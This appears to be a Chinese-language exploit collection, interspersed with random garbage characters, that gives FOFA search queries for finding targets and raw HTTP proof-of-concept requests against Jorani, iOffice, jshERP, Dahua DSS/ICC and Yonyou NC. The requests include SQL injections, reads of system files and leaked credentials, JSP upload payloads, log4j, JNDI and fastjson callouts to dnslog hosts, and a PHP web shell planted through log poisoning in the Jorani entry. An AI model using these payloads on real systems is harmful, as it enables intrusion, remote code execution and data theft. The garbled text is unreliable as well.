, {7 Y) o: q8 ~% DGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1+ X! k6 A9 a4 K& s# y
Host: 127.0.0.1
- [7 i+ K) D3 }0 LPragma: no-cache* P& K7 _& Q& H$ H9 O
Cache-Control: no-cache. x: F1 `3 B) Y$ M* z& c
Upgrade-Insecure-Requests: 1 f9 I* D: W+ R% t$ ]9 F! ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: w3 Q$ `- A. s9 r. P" o1 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% ?! |0 Z$ `, f8 ]5 U" z
Accept-Encoding: gzip, deflate
& V; [! T% Y9 e& K5 r h& |Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 M9 ^, L$ `# ?, V0 O7 @Connection: close x" l- |: P/ n$ F1 q" S
2 f8 H/ S& E, I; k W
- j4 }+ j' }1 h12. Jorani < 1.0.2 远程命令执行
8 [9 f; s, q! QFOFA:title="Jorani"
7 _, b/ y2 {/ D) n, M第一步先拿到cookie4 @1 y- b1 S0 a, Q) q
GET /session/login HTTP/1.1
% r) j- b' M( m6 |Host: 192.168.190.30# a$ u0 w( O, `) V! e0 j4 h
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; ?+ }3 v q9 f
Connection: close9 a. ]; M: _7 t- i( F2 U- w
Accept-Encoding: gzip* s$ u/ p3 n; x, K+ G
, N) G U- O; o: A& n
3 ?% U5 t6 G. Y4 t0 G8 h+ H响应中csrf_cookie_jorani用于后续请求
1 U' w- l1 r, y4 F, g; d+ yHTTP/1.1 200 OK
) H3 |! B _7 ?0 E8 JConnection: close
( b8 W$ y- U nCache-Control: no-store, no-cache, must-revalidate
8 V8 z$ \2 Y: I5 R. F5 KContent-Type: text/html; charset=UTF-8
6 g* I9 w/ h& J, a# j' S( A. f w# @% \: tDate: Tue, 24 Oct 2023 09:34:28 GMT' y* m; z! b# E9 D
Expires: Thu, 19 Nov 1981 08:52:00 GMT
5 Z' Y( V B5 I3 M. X+ D3 CLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
+ S: X( E. l6 B# _6 \0 ~; M) PPragma: no-cache
6 i* g1 P8 G, `& G! qServer: Apache/2.4.54 (Debian)4 [. @' I( v7 Y, R0 z5 b. @) ]
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
8 p2 u% z4 P# f% t# |: ]1 lSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
# F8 x8 z. Y" V6 r+ `Vary: Accept-Encoding: o7 Z0 d- C: ?% s
5 A- J7 q# i9 b
t; H$ E6 x. S" H9 b
POST请求,执行函数并进行base64编码3 q% y4 s% ?& Z& [
POST /session/login HTTP/1.1+ b3 _$ s! g+ F( L+ U
Host: 192.168.190.30
. T$ @# F7 U( R6 x4 [0 U$ o3 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36( b. b) R" A& R. F& a7 d/ \
Connection: close
0 G0 H& H6 x- ^# \$ e& i$ F" s% GContent-Length: 252
2 u7 E B8 R! M2 }: U, j& {- |; f. Z eContent-Type: application/x-www-form-urlencoded0 M2 L: U7 L8 `+ V
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r( Y2 u ?! D$ y8 ?5 n' w6 I) V4 K& X, l
Accept-Encoding: gzip8 Y. i$ r+ F# ^- Y9 B/ S/ i
2 R/ u0 ~5 ]1 X7 U( ^8 q& `csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
6 i: `) Z- Z, H4 ^" F/ q
" z! R+ Z) u; K; ^1 ~7 |0 x, W! P& @8 C( w
' n5 a6 b$ ~3 b! q& |+ [向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串! f- o2 D* A1 _, A$ x- r
GET /pages/view/log-2023-10-24 HTTP/1.1
9 i) q5 u" V3 t( i7 G' w: C+ @Host: 192.168.190.30. k* D0 G4 S7 |; g" z) ~; O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 A/ O& A& U3 G8 y/ \
Connection: close7 z7 i$ o9 ~1 m* q0 ^
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r& Q. T9 n8 W3 E" ]# I
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=5 u0 x }; L, l( e8 s
X-REQUESTED-WITH: XMLHttpRequest3 K ?! y* g$ T8 `, t, z. Y4 p
Accept-Encoding: gzip A) ^2 D# ^3 [
/ X$ f, T3 b& h( I" B0 k
6 H. @7 }8 e7 c. q- f8 M. a- I13. 红帆iOffice ioFileDown任意文件读取+ s: r9 V# f% ^9 \- W
FOFA:app="红帆-ioffice"7 R8 ~0 v1 h. P: A
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.19 p# ~; |) X- a- C& R7 C* Z5 k
Host: x.x.x.x/ f+ S; w- G3 ^# A. r! r! ^; I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ B; V6 L) N+ e- X
Connection: close* f+ w' {$ n9 ?. D; ~+ g9 s
Accept: */*4 L- b- X0 F, n1 ]4 X( D
Accept-Encoding: gzip. S1 v% f7 O0 C5 {
: ]: I1 w! c0 |, b4 a
' j1 `0 L0 I d# i: O7 g \8 M" \' L
14. 华夏ERP(jshERP)敏感信息泄露 Z$ G2 H- {8 w$ Z. n
FOFA:body="jshERP-boot"
6 ]8 I7 W# z5 i4 ]9 s" G8 \泄露内容包括用户名密码- v1 d5 J- A3 {8 v
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1& H. p0 |) V# F# Q) ]$ v
Host: x.x.x.x
( U' I% Z7 V. i# f ?" cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36) [/ k* N, `6 q
Connection: close! n9 O% w. M% [) y; v' h8 ^
Accept: */*3 w, l: v7 ` y3 l( p) S3 t9 G, ^
Accept-Language: en" |2 ~) @* g7 ]. L P# p6 [
Accept-Encoding: gzip+ J) u" t7 y+ M c% w. M9 u
* |, @" G1 m& P
6 P e3 l# E- t; ^9 @6 I15. 华夏ERP getAllList信息泄露4 W+ ]) O, F+ I l/ d* O4 Y: O
CVE-2024-0490
' g( y8 X6 P) u* {1 EFOFA:body="jshERP-boot"
4 {2 ]0 a5 l+ {3 I' `3 V泄露内容包括用户名密码
1 a# R4 N: P0 H oGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1( r9 o# ]' v" _+ I4 ~( s
Host: 192.168.40.130:100' L5 o+ _0 e- ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
+ G( a: g( _: b6 P7 x2 i3 {6 x- lConnection: close
! @+ q# Q: H% Q3 u; [. J4 pAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8& V4 |- Z9 C* J8 C$ e9 O. m" {4 ~
Accept-Language: en! {" Z, Z. R9 D) H
sec-ch-ua-platform: Windows
2 O+ \7 D! J# f6 W" sAccept-Encoding: gzip
' J7 k _6 o$ n0 S+ u
, ?) i4 r5 O: v( g5 M. n2 |! r( k
4 v6 v6 O, q$ H: W! t( M/ P" j7 I6 P# @0 Y16. 红帆HFOffice医微云SQL注入
% B8 W1 T$ V6 y7 k; _8 g" IFOFA:title="HFOffice"
7 j& l* z3 I9 bpoc中调用函数计算1234的md5值
! ?1 B0 A9 I9 G. s7 D( FGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.12 Y Y, F( y+ m0 U6 u7 ~ l
Host: x.x.x.x
6 ^: J% G2 I( `2 F2 b& [; `User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
! {5 v1 W: Q$ fConnection: close6 c, r }0 y4 q- o7 R/ E0 w/ p& |
Accept: */*0 j" B" n: P1 E* m, n% H
Accept-Language: en
8 ~6 X7 a- s' n( P2 l+ L" e: QAccept-Encoding: gzip6 V u5 o" m% N1 X8 M
. m& u" i9 }6 \/ k0 p, V d; o: |/ z* M( G; W: O3 ^
17. 大华 DSS itcBulletin SQL 注入: e3 U- f! F4 D$ H, t
FOFA:app="dahua-DSS"5 H* Z g7 ]+ E$ U# d
POST /portal/services/itcBulletin?wsdl HTTP/1.1
2 i6 E; s7 B# }5 h, yHost: x.x.x.x
9 { b, H. m9 ?0 ^9 u$ {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. e$ ~0 ]1 ^4 C% y$ X% y- _6 y7 S5 bConnection: close
* g E; D: Z: N2 HContent-Length: 345
1 ]/ Q3 s7 A( Y+ a) AAccept-Encoding: gzip
! a0 `. h7 j( t' z/ Z/ R& S8 T
: W) x/ k8 ~# }& q, V<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>' d% O, I! \! A4 m* w
<s11:Body>
* Z- `8 ^( b0 x <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
! A) u: o9 b5 l' W3 k3 O <netMarkings>
+ w6 }( u/ T9 |0 K (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1% i0 V2 o. q" n/ K! Z5 `8 {
</netMarkings>
. g; D9 v" H4 A0 e6 T" U </ns1:deleteBulletin>4 i' ~: b' `% U) _0 D9 n) C
</s11:Body>
5 M0 p/ N. z: ?# N</s11:Envelope>+ f" ]6 j! t) A# n9 I, W* ?4 _
1 Y0 k8 U) \( \/ V: W' d3 L6 K
% P$ Y2 a/ _: b" L18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. H% C' V( t6 a
FOFA:app="dahua-DSS"9 s' M$ L' m+ m
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1' P" B a! k+ B' E. ^8 e6 I
Host: your-ip% |' {9 v9 S1 Y# N' r6 K; m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ F. z2 w% z& B# b( PAccept-Encoding: gzip, deflate
- N, w" p1 P! M$ X3 s WAccept: */*& _9 [+ q/ [0 Q( R/ h
Connection: keep-alive
( F/ A- F+ c* E' q3 X' Q1 `: R5 R8 ^2 G- c- x6 o0 M
, F# Q- [5 y/ S: J! t
1 X6 \! ~# ^4 A6 h19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入 x% s: J3 J$ \! t# W
FOFA:app="dahua-DSS"
) a! r( Z4 s$ r3 IGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1, @4 t0 m- R4 [/ I5 M2 [2 W4 K$ a
Host:
8 `5 H8 p+ }# W8 J+ @/ T3 BUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; g( S+ H" s u! a8 h9 V1 LAccept-Encoding: gzip, deflate
# ~6 R- Y1 V# o- ?7 @/ v5 l+ s' X. bAccept: */*8 e6 p i: E" ?# d" z
Connection: keep-alive
/ o4 j1 k M5 G5 y* E5 P$ S; g9 d7 p. U! l7 {+ |8 r6 o+ I7 W
/ r3 T/ o" p: G4 n5 Y
20. 大华ICC智能物联综合管理平台任意文件读取
3 w9 s' ^0 v2 z2 S& n0 QFOFA:body="*客户端会小于800*"
7 C. N6 M/ V1 P5 k3 mGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
/ `6 f/ ?# T( K- H# G7 |& k+ P2 aHost: x.x.x.x9 Y) K' }, q& i4 x! V1 x9 c# H
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 R" R& S8 l7 K# |
Connection: close& z- x5 Y i. {2 J6 A
Accept: */*
9 H2 O: [. W! W1 OAccept-Language: en
+ c8 ~1 G2 u( k8 @- IAccept-Encoding: gzip
& `7 {. c8 ?- Z. o/ ]9 M
9 U, I3 f" S) C- C9 C8 V3 p( c& C" O- [' [0 ]+ R2 t
21. 大华ICC智能物联综合管理平台random远程代码执行
9 O, x* A$ e' D1 U% k. r' h7 [FOFA:icon_hash="-1935899595"' i1 n1 ~( Y4 }: x; {$ P
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1( l3 _5 q2 Y' U9 k- ]- O- P
Host: x.x.x.x, r. B5 A0 G2 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- f0 X* m$ W% R( q
Content-Length: 1610 Y' c2 B6 j/ I+ }2 L9 N, l+ h. X
Accept-Encoding: gzip
+ i3 A3 a1 T1 w5 ]9 `# S1 oConnection: close
8 ?9 K7 E# x/ b ^/ _/ w- U8 kContent-Type: application/json;charset=utf-87 M3 {8 x. D1 o4 P0 |" i5 I/ O. S4 D
& J2 D' u! `' K c/ A{+ B2 j$ k) s0 P' t4 u6 R
"a":{
V, ? B8 h0 T2 ~ "@type":"com.alibaba.fastjson.JSONObject",- f8 S/ j6 t( P4 c' _! _- y
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}+ V' u$ [* l9 n% L, j1 U
}""! i$ I; i0 W6 A0 T, L
}
, M$ {! R5 T8 Q
; x8 m) q7 V, {$ h7 F5 m/ s' R$ p8 ?5 S- F+ {3 v3 j- C8 Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
$ c( X: w5 R0 p4 @FOFA:icon_hash="-1935899595"
" Y- l5 ?: S2 B- ]+ M3 SPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
( L# [9 ~& e5 B+ r. G7 G0 \Host: your-ip/ s- Z; I( t. W3 z! d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, K+ p" W# L- }$ k- q7 L
Content-Type: application/json;charset=utf-8: S% s; H7 P- C- L# _( l, P5 Q: J
8 j$ Q) j, P& Y' t$ A{0 v3 g, J& U8 I5 r% X' i
"loginName":"${jndi:ldap://dnslog}"
. n& C5 H7 `6 I9 J% K}# E) c9 P, v+ c) [: n
: w) Y+ p7 @9 ^6 j- i
. H" M+ N1 b( ^& e2 @; X
! h* k- I0 F) n4 W1 ~23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( F! ` d M( W: ]7 ]0 TFOFA:icon_hash="-1935899595"4 V+ z: [& ?, O. u% i9 l5 D
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1( a% @( G. ^; R: G
Host: your-ip+ X5 w0 y( }; d: j- w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 ]/ e* ?$ M. L$ J
Content-Type: application/json;charset=utf-8
) v( K3 }6 `4 ]& v) j) DAccept-Encoding: gzip
1 {. j& y- x& C6 q* x( u/ ~# XConnection: close+ n; x+ r1 ^) t2 f8 H: {
?- o$ y/ G4 K, w2 w( }{9 X8 O! m d! E% J1 ~
"a":{
% Y5 |$ p% f1 E& V "@type":"com.alibaba.fastjson.JSONObject",
7 C) X, Z9 E/ Z) P: J- w {"@type":"java.net.URL","val":"http://DNSLOG"}
- f% I" M5 N7 a: d; A }""
) A7 }$ F, j! z- h ~}
7 |7 J, r, @, |/ L4 v
. l' p' ^. S# Y. N' [& Y- N
# l! V: Q( V: O7 v8 [24. 用友NC 6.5 accept.jsp任意文件上传7 m2 v7 r% V$ X2 F2 H
FOFA:icon_hash="1085941792"$ g; f+ i3 ^3 v
POST /aim/equipmap/accept.jsp HTTP/1.19 F# p1 \. w" p9 y+ i) T
Host: x.x.x.x3 w/ Q5 H, Z' p/ i) @. Y
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
& X5 E4 T {1 V) M0 eConnection: close8 t( f6 ^ v0 k$ n- o1 R
Content-Length: 449
$ W) {7 b3 K+ P4 q9 C( [Accept: */*
1 w$ ?6 W U3 ~$ w1 M- ?; a4 U$ [Accept-Encoding: gzip# C, b: M* o" l# R7 g! x8 r
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
$ Z* |% E' \3 k: o3 q1 T6 M
) m$ Z8 n' s8 F1 y-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc/ s, ^& v4 f4 d2 c( o+ @! Y: X
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"; I8 A" C' F) c- Y! Z' B6 ^
Content-Type: text/plain
+ z2 t, L6 g0 E9 C
1 _6 I$ L2 I9 G3 H5 Q! c! _5 V<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
) D- d7 G3 b2 z+ N5 o-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, t9 k% c$ f9 H) x5 p$ i! _9 {
Content-Disposition: form-data; name="fname"" q z# ]" f; N* f# L' y v
2 i7 j3 A0 B: F, `. ?; R
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp1 V0 J: i$ A( N
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
; ^8 ]2 g6 g4 c) `8 e. d o4 n! T. B5 | M2 y% l5 G
. Y( E5 G l/ k7 u$ G$ n
25. 用友NC registerServlet JNDI 远程代码执行5 x1 s/ w0 P0 x( i
FOFA:app="用友-UFIDA-NC"7 O# B; a* Y9 W% p. o, f
POST /portal/registerServlet HTTP/1.14 }& U; B `3 a& D% [* h
Host: your-ip
: c) R/ x. }7 V" l& _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.06 j0 q5 N. k: [ z+ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9* d+ B2 k, y0 X. r$ |; j, s
Accept-Encoding: gzip, deflate
7 q' l% f) d; c7 JAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
/ {3 O6 f! {. l* w, }8 u" a3 ^3 SContent-Type: application/x-www-form-urlencoded
. N5 ^" I; L5 N8 R* x. ]1 C Q4 W+ ^
type=1&dsname=ldap://dnslog
8 ^. M4 i) K) R$ `
# E4 u [1 S( P% J3 a+ j) Z+ X0 w* b! ~9 f/ l
) d+ g* W' M ^! { @. s) R: |9 P26. 用友NC linkVoucher SQL注入: L& o' {& j% A5 y
FOFA:app="用友-UFIDA-NC"' {! ?) o1 I4 h0 z5 E) r( q6 B
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1( b; h, u7 q/ o3 v9 {& f/ {
Host: your-ip; p/ z& z3 ] Q( `, R# _1 G4 V4 j Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ _; D, c! H/ S J, F+ S+ q
Content-Type: application/x-www-form-urlencoded5 d$ k# l+ z* X2 H
Accept-Encoding: gzip, deflate
1 X5 ?, k* E5 s: i6 ~! E8 e+ q3 \& IAccept: */*
# o3 r; X5 E+ R% f7 n) K5 e( KConnection: keep-alive* I' t* x3 z9 u0 K
! |( ]( A6 T- c9 ?9 j; L) } P! W! {
27. 用友 NC showcontent SQL注入9 s8 H' O8 P0 i5 v5 M) h
FOFA:icon_hash="1085941792"* g( E( ^# D @( }
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1- N* ?! q- {: q: j- J
Host: your-ip2 G& P% o0 F& {- `; d1 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 V% ~3 d, l( h L
Accept-Encoding: identity* t& D& R' T3 N9 f2 f& n3 _& i0 ~
Connection: close6 n6 V/ L1 T; l" B
Content-Type: text/xml; charset=utf-8
! y& L4 _( s) P
* B0 C! K1 v$ @" u/ m0 t& x
5 T4 a4 y/ H! s) v: T& f# V28. 用友NC grouptemplet 任意文件上传
5 L7 D$ p7 D/ z2 qFOFA:icon_hash="1085941792"
: f" M2 U0 l" |. p" i. a$ S( w2 }POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
4 h4 ^# K+ L, q. EHost: x.x.x.x. Q8 p: ?; }+ d- P' `5 Q& h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
/ m- ~- q8 B7 a' j. ?Connection: close3 w/ ^9 z9 \3 G$ j+ r# Y: y( K
Content-Length: 268& y1 F P3 I0 S, }
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, @& [( L9 Y/ Y: B
Accept-Encoding: gzip7 ?, m2 ]! M; H B* n+ {- C0 p9 U
; C% J' H7 o) G0 e2 f! q- m------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
; o+ L; j; {4 j; |Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
+ B4 S3 V9 F: Y. W% W* dContent-Type: application/octet-stream/ M5 S6 |; C7 D
. I; q; y, G B7 N8 o0 \3 z5 [& q7 n
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
$ V F! c. B: j( i* k- Q------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--3 e# S7 h7 L* j1 ~6 P* s7 W; r) `+ u) c- d
" `2 e5 g: r( T5 T2 a0 x! e" Z: a. j+ b$ C7 Q
/uapim/static/pages/nc/head.jsp) Q1 G4 [# J8 v
4 k H3 H$ \% X3 P; z+ F5 P29. 用友NC down/bill SQL注入$ s4 K% q7 e, `3 H
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% @5 m: Q" `5 L' h* uGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1* U+ f" \" n6 f+ B
Host: your-ip
" I. K# }9 X+ D* {% GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 \6 F" N3 z6 x# ^- A+ mContent-Type: application/x-www-form-urlencoded, f7 [; z- U1 E4 y3 |
Accept-Encoding: gzip, deflate/ t6 w" t$ d# L/ D+ u8 B
Accept: */*8 r, `9 F8 Z4 g# q
Connection: keep-alive( z% O7 V8 I6 a9 W0 [/ J, l
5 ?9 O. [2 ^; V% B7 D: z1 t
8 w! d& `: u- m4 d% F+ V5 a30. 用友NC importPml SQL注入
8 N- c/ o. L9 oFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
# q5 o/ T2 I3 t$ Z+ u aPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1: ~8 j8 K2 {+ w/ D. t9 b0 t K7 n+ p) O
Host: your-ip
x/ E$ F/ f, E" q$ B+ t4 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
C+ L$ z) |7 B) G) nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' E. }% V; M4 q0 }Connection: close
, t, _) T1 m6 V7 b1 }6 ~1 G( L4 S& i3 Z; \
------WebKitFormBoundaryH970hbttBhoCyj9V
5 g. _& F. {* pContent-Disposition: form-data; name="Filedata"; filename="1.jpg"% `1 n% A W I
Content-Type: image/jpeg
; L5 v4 d& Z; o' r, h7 b" S------WebKitFormBoundaryH970hbttBhoCyj9V--
: H$ f/ o4 O2 g8 g- x' [5 R9 Q- X
m+ S$ q. h# C. i1 L [# D( P' S" t {% \
31. 用友NC runStateServlet SQL注入
: u8 ~1 C% m1 C4 g9 Mversion<=6.5+ H5 h w! l6 V8 z- }3 J; ]
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
/ K* A+ }! Q' `1 X9 p) S. l% [; J/ OGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ }' \ j4 u& X6 P* k7 p
Host: host6 Z: z- J8 z) V6 u& S( X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 x! P/ G/ e) aContent-Type: application/x-www-form-urlencoded/ ]) ^$ F9 k: E# @9 D1 F
* G- z0 ?1 |, `
6 q) x: |0 \' F* ^ D, e& D9 ?32. 用友NC complainbilldetail SQL注入( B; t& f$ t) [& ]+ u; c# B
version= NC633、NC65
" K4 ?" U1 k1 O2 Q+ PFOFA:app="用友-UFIDA-NC"+ ?) X& y9 x' W$ Q7 {& X
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& d+ Q3 n" M% O$ z; `Host: your-ip7 k- o0 N! B0 Z& `" f' |) E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: K U- {) _% V2 } X$ f" p6 E: W
Content-Type: application/x-www-form-urlencoded
+ Z9 ]% C$ L6 I* A, K- V2 c" `+ vAccept-Encoding: gzip, deflate
# u4 V" j$ J0 G0 P/ ^' R( [1 H( cAccept: */*
% y w; X; n4 k. ^/ P: M- t& n/ RConnection: keep-alive( e! {' m: V: F
0 C v5 }/ B* `: m$ i* D0 \* F
1 y3 Y2 w; _# q- x% _, c9 d& T( M33. 用友NC downTax/download SQL注入
6 W( {* B$ A qversion:NC6.5FOFA:app="用友-UFIDA-NC"
6 g) U2 Q' y0 W' W$ Y( ~% iGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1' ^& R2 H4 \$ L0 S
Host: your-ip1 M( T8 b2 P$ b& H3 l2 `& F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 j! d- S- L M! O- ^
Content-Type: application/x-www-form-urlencoded
: V# v1 W! g; D& O& q+ gAccept-Encoding: gzip, deflate
. ]7 f/ {' @: L: t/ f* l AAccept: */*4 g% i; e+ q3 l0 H9 n9 }
Connection: keep-alive8 [' i) j V6 Z" P! ~1 @2 X
. L4 P8 X, @# @7 r9 z9 i% ]1 @# x2 a
34. 用友NC warningDetailInfo接口SQL注入$ M3 [9 q( ?3 v/ P, S+ O3 |+ S
FOFA:app="用友-UFIDA-NC"
1 F2 ]( T( I3 _GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.12 T) s3 y. H. V, ?3 u% j) \
Host: your-ip
6 p' d- y M' s! J! I" BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 V A' U4 D. jContent-Type: application/x-www-form-urlencoded
+ B% q) V: [ l3 ^+ X' C; F) ]Accept-Encoding: gzip, deflate+ d# r- M5 m! ?( U7 `- t
Accept: */*
